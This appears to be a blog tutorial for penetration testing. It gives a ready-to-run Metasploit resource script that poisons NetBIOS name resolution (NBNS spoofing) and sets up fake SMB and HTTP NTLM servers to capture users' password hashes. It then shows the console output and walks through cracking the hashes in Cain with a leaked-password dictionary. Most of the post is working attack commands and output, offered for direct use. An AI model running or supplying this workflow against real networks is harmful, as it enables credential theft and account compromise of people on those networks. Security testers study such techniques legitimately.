PenTest-One netbios-resource

1. create script change Your-IP-Address to your IP address and save as .rc file. If notepad save as all files .rc

#########Highlight and copy from use auxiliary/server/capture/smb stop just after last run#########

use auxiliary/server/capture/smb
set srvhost Your-IP-Address
set cainpwfile /tmp/cain-smb
set johnpwfile /tmp/john-smb
set logfile /tmp/logfile
run
use auxiliary/server/capture/http_ntlm
set srvhost Your-IP-Address
set srvport 80
set uripath /
set cainpwfile /tmp/cain-http
set johnpwfile /tmp/john-http
set logfile /tmp/logfile
run
use auxiliary/spoof/nbns/nbns_response
set spoofip Your-IP-Address
run

#########Don't copy this#########

2. To run on kali or backtrack

root@kali:~# msfconsole -r /root/Desktop/Metasploit/netbios-resource.rc

Metasploit will start the script will configure all the required listeners (This is passive!)

root@kali:~# msfconsole -r /root/Desktop/Metasploit/netbios-resource.rc

______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                        http://metasploit.pro |
|______________________________________________________________________________|

Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
-- type 'go_pro' to launch it now.

=[ metasploit v4.7.2-2013110601 [core:4.7 api:1.0]
+ -- --=[ 1226 exploits - 743 auxiliary - 203 post
+ -- --=[ 322 payloads - 30 encoders - 8 nops

[*] Processing /root/Desktop/Metasploit/netbios-resource.rc for ERB directives.
resource (/root/Desktop/Metasploit/netbios-resource.rc)> use auxiliary/server/capture/smb
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set srvhost IP-Address
srvhost => IP-Address
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set cainpwfile /tmp/cain-smb
cainpwfile => /tmp/cain-smb
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set johnpwfile /tmp/john-smb
johnpwfile => /tmp/john-smb
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set logfile /tmp/logfile
logfile => /tmp/logfile
resource (/root/Desktop/Metasploit/netbios-resource.rc)> run
[*] Auxiliary module execution completed
resource (/root/Desktop/Metasploit/netbios-resource.rc)> use auxiliary/server/capture/http_ntlm
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set srvhost IP-Address
srvhost => IP-Address
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set srvport 80
[*] Server started.
srvport => 80
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set uripath /
uripath => /
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set cainpwfile /tmp/cain-http
cainpwfile => /tmp/cain-http
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set johnpwfile /tmp/john-http
johnpwfile => /tmp/john-http
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set logfile /tmp/logfile
logfile => /tmp/logfile
resource (/root/Desktop/Metasploit/netbios-resource.rc)> run
[*] Auxiliary module execution completed
resource (/root/Desktop/Metasploit/netbios-resource.rc)> use auxiliary/spoof/nbns/nbns_response
[*] Using URL: http://IP-Address:80
[*] Server started.
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set spoofip IP-Address
spoofip => IP-Address
resource (/root/Desktop/Metasploit/netbios-resource.rc)> run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) >

---------------------------------------------------------------------

3. Wait just leave running you will see netbios broadcasts. Hash stored to /tmp

4. Open /tmp and open the john-http, cain-http, john-smb and logfile and copy and save to notepad save as .txt
5. Open Cain in Windows. Cracker tab, select LM & NTLM Hashes then right click on the page and select Add to list / Import Hashes from a text file
6. Once loaded select your password dictionary a good selection can be found @ (https://wiki.skullsecurity.org/Passwords leaked passwords)
7. Right click on hash and Dictionary Attack, choose the hash type (look at the type on top column to see what the type is) Then Start. Personal preference is to untick Num. sub. perms as this option really slows it down.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s